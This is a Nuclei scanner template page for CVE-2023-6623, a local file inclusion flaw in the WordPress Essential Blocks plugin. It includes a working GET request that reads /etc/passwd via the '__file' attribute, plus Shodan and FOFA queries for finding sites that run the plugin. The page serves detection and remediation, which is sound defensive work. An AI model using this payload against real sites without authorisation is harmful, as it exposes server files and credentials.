Skip to content
Nuclei Templates

Essential Blocks < 4.4.3 - Local File Inclusion

ID: CVE-2023-6623

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch,coldfish

Tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper

Description

Section titled “Description”

Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.

YAML Source

Section titled “YAML Source”
id: CVE-2023-6623


info:
  name: Essential Blocks < 4.4.3 - Local File Inclusion
  author: iamnoooob,rootxharsh,pdresearch,coldfish
  severity: critical
  description: |
    Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade to the latest version of Essential Blocks 4.4.3 to fix this issue.
  reference:
    - https://wpscan.com/blog/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3/
    - https://flysec-blog.blogspot.com/2024/01/cve-2023-6623-file-inclusion.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6623
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6623
    cwe-id: CWE-22
    epss-score: 0.07821
    epss-percentile: 0.94063
    cpe: cpe:2.3:a:wpdeveloper:essential_blocks:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpdeveloper
    product: essential_blocks
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/essential-blocks/
    fofa-query: body=/wp-content/plugins/essential-blocks/
    publicwww-query: "/wp-content/plugins/essential-blocks/"
  tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper


http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"}'
      - '{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt'


    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "regex('root:.*:0:0:', body_1)"
          - 'contains(body_2, "Essential Blocks – Page")'
        condition: and
# digest: 490a0046304402207f459ff6060aedb2acf0039a0b92966856debf787ea9ef04a1aaad194212812002204b50870b41da55b2806b5268511ee9d89abc4a200ef55f9af904640c339de270:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-6623.yaml"

View on Github